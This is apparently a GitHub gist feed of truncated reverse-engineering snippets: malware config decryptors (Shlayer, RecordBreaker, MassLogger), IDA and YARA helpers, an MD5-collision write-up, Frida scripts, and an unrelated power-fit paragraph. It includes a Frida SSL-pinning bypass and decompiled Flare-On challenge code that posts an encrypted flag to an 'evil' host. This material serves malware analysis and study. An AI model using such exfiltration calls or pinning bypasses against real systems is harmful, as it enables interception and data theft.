@tahaconfiant
tahaconfiant / shlayer_decrypt.py
Created December 23, 2022 15:14
command line script to decrypt OSX/Shlayer.F C2 configuration
# author : [email protected] aka lordx64
# OSX/Shlayer.F C2 config extracting from DMG files
# copyright 2022 - All rights reserved
# compatible python 3.8
# Note on installation on mac:
# brew install gmp
# then: env "CFLAGS=-I/usr/local/include -L/usr/local/lib" pip3 install pycrypto
from Crypto.Cipher import AES
import argparse
@0xca7
0xca7 / gist:696e4e65f72c9aac442340c9d7ef9131
Created December 23, 2022 09:54
highlight and decrypt strings in recordbreaker malware
//TODO recordbreaker string decryption via selection
//Applied to sample: 746669c6be1807fdafbc7ee3f1e958e1b584fa31688742bcc044d269af94b0d8 (sha256)
//@author 0xca7
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
import ghidra.app.script.GhidraScript;
import ghidra.program.model.mem.*;
@notareverser
notareverser / ida-null-bytes.py
Last active March 11, 2025 00:16
IDA Python script to NOP (x86/x64) selected bytes
import idaapi as ia, idc

def PLUGIN_ENTRY(): return nop()

class nop(ia.plugin_t):
    flags = ia.PLUGIN_UNL
    comment = "NOP"
    help = "select bytes, run"
    wanted_name = "NOP bytes..."
    wanted_hotkey = "Ctrl+Shift+N"
@incogbyte
incogbyte / mixunpin.js
Last active April 21, 2025 03:21
Frida script to bypass common methods of SSL pinning on Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
# Simple show-off using PowerShell and Reflection to extract masslogger config
# Example Sample: https://bazaar.abuse.ch/sample/7187a6d2980e3696396c4fbce939eeeb3733b6afdf2e859a385f8d6b29e8cebc/
# Twitter Info: https://twitter.com/vinopaljiri/status/1593125307468623874
# get the class where config is initialized -> careful, by this we invoked the constructor and all fields are already populated but encrypted
$configClass = [System.Reflection.Assembly]::LoadFile("C:\Users\Inferno\Desktop\test\sample.exe").GetTypes() | ? {$_.Name -like "xmA"}
# class is static so we are not creating instance of it in Invoke
# by invoking this method, config gets decrypted so also its responsible fields (remember reflection Rocks :))
($configClass.GetMethods() | ? {$_.Name -like "Aak"}).Invoke($null, $null) | Out-Null
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.11 (default, Jul 27 2021, 09:42:29) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: <frozen 11>
import crypt, base64, requests
config = {'url':'http://www.evil.flare-on.com', 'flag':b'[email protected]', 'key':b'PyArmor_Pr0tecteth_My_K3y'}
cipher = crypt.ARC4(config['key'])
flag = base64.b64encode(cipher.encrypt(config['flag']))
try:
    requests.post((config['url']), data={'flag': flag})

We fit an exponential function for $f$: $f(V) = a \exp(V / s)$ and obtain $a \approx 0.02485702\ \mathrm{A}$ and $s \approx 0.229551831\ \mathrm{V}$. With this, the deviation of the measured values from the total model $P(V) = 414\ \mathrm{mW} + V \cdot 130 \cdot f(V)$ is always below $8\ \mathrm{mW}$; in fact it is at most $\approx 3.19\ \mathrm{mW}$ and on average $\approx 1.28\ \mathrm{mW}$.

When we do not fix the offset at $414\ \mathrm{mW}$ but instead leave it as a free parameter of the fit, we obtain $\approx 412.3\ \mathrm{mW}$ for the offset, $a \approx 0.0249451511\ \mathrm{A}$ and $s \approx 0.229653915\ \mathrm{V}$, with a maximum error of $\approx 2.28\ \mathrm{mW}$ and an average error of $\approx 0.74\ \mathrm{mW}$.

@xorhex
xorhex / go_macho.yar
Created October 15, 2022 02:47
Look for Go build ID in Macho X86_64 Files
import "macho"
rule is_go_macho {
    strings:
        $go = { ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 } // \xff Go build ID: \"
    condition:
        macho.cputype == macho.CPU_TYPE_X86_64
        and
        for any s in macho.segments : (

MD5 Collision with CRC32 Preimage

Here's the scenario: We want to craft two different messages with the same MD5 hash, and a specific CRC32 checksum, simultaneously.

In other words, we want an MD5 collision attack and a CRC32 preimage attack.

This might seem like a contrived scenario, but it's exactly the one I faced while producing my PNG hashquine (Yes OK maybe that's also a contrived scenario, cut me some slack).

On its own, a CRC32 preimage attack is trivial. You can craft a 4-byte suffix that gives any message a specific checksum, calculated using a closed-form expression (which I am too lazy to derive, not even with assistance from Z3). It's not an attack per se, since CRC32 was never meant to be cryptographically secure in the first place.

@pellaeon
pellaeon / child-gating-poc.py
Created September 23, 2022 12:21
Frida child-gating and spawn-gating example
"""
This POC is based on example from https://frida.re/news/#child-gating
and is aimed to instrument child processes along with the main one.
"""
from __future__ import print_function
import frida
from frida_tools.application import Reactor
import threading